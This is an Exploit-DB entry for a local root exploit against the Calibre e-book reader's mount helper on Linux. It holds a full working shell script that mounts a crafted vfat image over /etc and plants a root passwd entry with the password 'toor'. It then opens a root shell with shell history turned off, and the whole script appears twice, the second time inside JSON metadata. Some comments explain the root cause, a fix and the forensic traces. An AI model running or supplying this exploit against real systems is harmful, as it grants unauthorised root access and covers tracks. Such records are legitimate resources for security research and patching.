ID EDB-ID:18071 Type exploitdb Reporter zx2c4 Modified 2011-11-03T00:00:00
Description
Calibre E-Book Reader Local Root Exploit. Local exploit for linux platform
# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
# Date: Nov 2, 2011
# Author: zx2c4
# Software Link: http://calibre-ebook.com/
# Tested on: Gentoo
# Platform: Linux
# Category: Local
# CVE: pending
#!/bin/sh
#######################################
# .60-Calibrer Assault Mount #
# by zx2c4 #
#######################################
################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundamental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker with /etc/passwd and make the root password
# temporarily "toor".
#
# - zx2c4
# 2011-11-2
#
# Usage:
# $ ./60calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
# [+] Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# [+] Mounting overlay image using calibre-mount-helper.
# [+] Copying /etc into overlay.
# [+] Tampering with overlay's passwd.
# [+] Unmounting overlay image using calibre-mount-helper.
# [+] Mounting overlay to /etc using calibre-mount-helper.
# [+] Asking for root. When prompted for a password, enter 'toor'.
# Password: [typed in toor to the terminal]
# [+] Unmounting /etc using root umount.
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
# [+] Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2#
################################################################################
# Proof-of-concept for the mount-helper flaw described in the header: the
# helper mounts a caller-supplied image on a caller-supplied directory, so an
# unprivileged user can shadow /etc with their own copy.
#
# Root cause (for the fix): the helper does the mount on the caller's behalf,
# so it runs with elevated privilege, yet the calls below show it accepting
# both a regular file as the "device" and an arbitrary path as the mountpoint.
# A safe helper would confine mountpoints to a dedicated directory and refuse
# sources that are not real removable devices, or hold no privilege at all.
#
# Evidence: the script unmounts the overlay at the end, so the on-disk
# /etc/passwd is never modified and file-integrity checks on it will not fire.
# What remains is mount/umount activity targeting /etc (audit records for
# mount(2), a vfat entry over /etc in the mount table while it is active) and
# a root `su` session in the authentication log.
echo "#######################################"
echo "# .60-Calibrer Assault Mount #"
echo "# by zx2c4 #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
# Work happens in a fresh mktemp directory; it is deleted by the final su
# command, so nothing is left under /tmp afterwards.
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making overlay image:"
# 51200 blocks at dd's default block size gives the 26214400-byte image shown
# in the usage transcript; it is then formatted as vfat.
dd if=/dev/zero of=overlay count=51200
/usr/sbin/mkfs.vfat overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
mkdir staging
# First helper call: image file as source, user-owned directory as target.
# The cp below succeeding implies the mount is writable by the calling user.
calibre-mount-helper mount overlay staging
echo "[+] Copying /etc into overlay."
cd staging/
# Errors are discarded, e.g. for files the unprivileged user cannot read, so
# the copy of /etc is best-effort rather than complete.
cp -a /etc/* . 2>/dev/null
echo "[+] Tampering with overlay's passwd."
# Drops the first line of the copied passwd (presumably root's entry -- this
# depends on the host's file ordering) and appends a root entry whose password
# field holds an MD5-crypt hash (`openssl passwd -1`) instead of a shadow
# reference. Only the copy inside the image is edited.
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "[+] Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "[+] Mounting overlay to /etc using calibre-mount-helper."
# Second helper call: same image, but the target is now /etc. This is the
# step a fixed helper must reject. Output is silenced, so a refusal here only
# shows up as the su below failing.
calibre-mount-helper mount overlay /etc >/dev/null 2>&1
cd /
echo "[+] Asking for root. When prompted for a password, enter 'toor'."
# While the overlay covers /etc, su authenticates against the tampered passwd.
# The command run as root then unmounts /etc (restoring the real one), removes
# the temp directory and starts a shell with HISTFILE=/dev/null, so no shell
# history is written for the root session.
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"
{"published": "2011-11-03T00:00:00", "id": "EDB-ID:18071", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 7.2}, "hash": "0a0bd199edc29420c55b9be25c34f0f66961addc5033fe872216aa2cad159f1e", "description": "Calibre E-Book Reader Local Root Exploit. Local exploit for linux platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/18071/", "lastseen": "2016-02-02T09:07:28", "edition": 1, "title": "Calibre E-Book Reader Local Root Exploit", "osvdbidlist": ["76827"], "modified": "2011-11-03T00:00:00", "bulletinFamily": "exploit", "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/18071/", "references": [], "reporter": "zx2c4", "sourceData": "# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root\r\n# Date: Nov 2, 2011\r\n# Author: zx2c4\r\n# Software Link: http://calibre-ebook.com/\r\n# Tested on: Gentoo\r\n# Platform: Linux\r\n# Category: Local\r\n# CVE: pending\r\n#!/bin/sh\r\n\r\n #######################################\r\n # .60-Calibrer Assault Mount #\r\n # by zx2c4 #\r\n #######################################\r\n\r\n################################################################################\r\n# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH\r\n# and get root, in my \".50-Calibrer Assault Mount\" exploit. Today we exploit a\r\n# more fundumental issue with Calibre's mount helper -- namely, that it allows\r\n# us to mount a vfat filesystem anywhere we want. 
By mounting a file system\r\n# image over /etc, we are able to tinker /etc/passwd and make the root password\r\n# temporarily \"toor\".\r\n#\r\n# - zx2c4\r\n# 2011-11-2\r\n#\r\n# Usage:\r\n# $ ./60calibrerassaultmount.sh \r\n# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4\r\n# [+] Making overlay image:\r\n# 51200+0 records in\r\n# 51200+0 records out\r\n# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s\r\n# mkfs.vfat 3.0.11 (24 Dec 2010)\r\n# [+] Mounting overlay image using calibre-mount-helper.\r\n# [+] Copying /etc into overlay.\r\n# [+] Tampering with overlay's passwd.\r\n# [+] Unmounting overlay image using calibre-mount-helper.\r\n# [+] Mounting overlay to /etc using calibre-mount-helper.\r\n# [+] Asking for root. When prompted for a password, enter 'toor'.\r\n# Password: [typed in toor to the terminal] \r\n# [+] Unmounting /etc using root umount.\r\n# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4\r\n# [+] Getting shell.\r\n# sh-4.2# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n# sh-4.2# whoami\r\n# root\r\n# sh-4.2# \r\n################################################################################\r\n\r\n\r\necho \"#######################################\"\r\necho \"# .60-Calibrer Assault Mount #\"\r\necho \"# by zx2c4 #\"\r\necho \"#######################################\"\r\necho\r\necho -n \"[+] Making temporary directory: \"\r\ndir=\"$(mktemp -d)\"\r\necho \"$dir\"\r\ncd \"$dir\"\r\necho \"[+] Making overlay image:\"\r\ndd if=/dev/zero of=overlay count=51200\r\n/usr/sbin/mkfs.vfat overlay\r\necho \"[+] Mounting overlay image using calibre-mount-helper.\"\r\nmkdir staging\r\ncalibre-mount-helper mount overlay staging\r\necho \"[+] Copying /etc into overlay.\"\r\ncd staging/\r\ncp -a /etc/* . 
2>/dev/null\r\necho \"[+] Tampering with overlay's passwd.\"\r\ncat passwd | tail -n +2 > tmp\r\necho \"root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash\" >> tmp\r\nmv tmp passwd\r\necho \"[+] Unmounting overlay image using calibre-mount-helper.\"\r\ncd ..\r\ncalibre-mount-helper eject overlay staging >/dev/null 2>&1\r\necho \"[+] Mounting overlay to /etc using calibre-mount-helper.\"\r\ncalibre-mount-helper mount overlay /etc >/dev/null 2>&1\r\ncd /\r\necho \"[+] Asking for root. When prompted for a password, enter 'toor'.\"\r\nsu -c \"echo \\\"[+] Unmounting /etc using root umount.\\\"; umount /etc; echo \\\"[+] Cleaning up: $dir\\\"; rm -rf \\\"$dir\\\"; echo \\\"[+] Getting shell.\\\"; HISTFILE=\\\"/dev/null\\\" exec /bin/sh\"", "objectVersion": "1.0"}